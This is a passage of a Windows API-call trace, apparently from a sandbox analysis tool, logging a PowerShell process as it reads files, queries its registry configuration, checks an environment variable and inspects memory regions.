	[0330.115] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.115] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.115] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.116] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.116] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.116] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.117] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.117] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.117] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.117] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.118] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.120] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.121] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.121] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.121] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.122] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.122] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.122] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.122] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.123] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1b4, lpOverlapped=0x0) returned 1
	[0330.123] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x0, lpOverlapped=0x0) returned 1
	[0330.123] CloseHandle (hObject=0x32c) returned 1
	[0330.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0330.123] SetErrorMode (uMode=0x1) returned 0x1
	[0330.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d0c0 | out: lpFileInformation=0x26d0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0330.124] SetErrorMode (uMode=0x1) returned 0x1
	[0330.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0330.124] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1a8 | out: phkResult=0x26d1a8*=0x32c) returned 0x0
	[0330.124] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d12c, lpData=0x0, lpcbData=0x26d128*=0x0 | out: lpType=0x26d12c*=0x1, lpData=0x0, lpcbData=0x26d128*=0x56) returned 0x0
	[0330.124] CoTaskMemAlloc (cb=0x5a) returned 0xec1a0
	[0330.124] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0fc, lpData=0xec1a0, lpcbData=0x26d0f8*=0x56 | out: lpType=0x26d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d0f8*=0x56) returned 0x0
	[0330.124] CoTaskMemFree (pv=0xec1a0) 
	[0330.124] RegCloseKey (hKey=0x32c) returned 0x0
	[0330.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0330.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0331.354] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.361] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.363] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.363] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.364] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.364] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.364] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.366] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.165] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.165] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.166] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.166] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.166] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.166] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.166] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.167] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.172] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.177] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.177] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.177] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.178] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.178] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.178] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.179] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.179] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.179] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.179] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.179] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.180] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.180] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.182] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.183] VirtualQuery (in: lpAddress=0x26bea0, lpBuffer=0x26cd60, dwLength=0x30 | out: lpBuffer=0x26cd60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.184] VirtualQuery (in: lpAddress=0x26bea0, lpBuffer=0x26cd60, dwLength=0x30 | out: lpBuffer=0x26cd60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.184] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.185] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.064] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.064] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.065] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.068] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0333.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.069] CoTaskMemFree (pv=0xffff0) 
	[0333.070] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.073] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.073] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.073] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.073] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.073] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.074] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.075] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.075] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.076] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d348 | out: phkResult=0x26d348*=0x304) returned 0x0
	[0333.076] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x26d35c, lpData=0x0, lpcbData=0x26d358*=0x0 | out: lpType=0x26d35c*=0x1, lpData=0x0, lpcbData=0x26d358*=0x74) returned 0x0
	[0333.076] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x26d2cc, lpData=0x0, lpcbData=0x26d2c8*=0x0 | out: lpType=0x26d2cc*=0x1, lpData=0x0, lpcbData=0x26d2c8*=0x74) returned 0x0
	[0333.076] CoTaskMemAlloc (cb=0x78) returned 0x11a330
	[0333.076] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x26d29c, lpData=0x11a330, lpcbData=0x26d298*=0x74 | out: lpType=0x26d29c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d298*=0x74) returned 0x0
	[0333.076] CoTaskMemFree (pv=0x11a330) 
	[0333.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0333.076] SetErrorMode (uMode=0x1) returned 0x1
	[0333.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0333.076] SetErrorMode (uMode=0x1) returned 0x1
	[0333.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0333.077] SetErrorMode (uMode=0x1) returned 0x1
	[0333.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
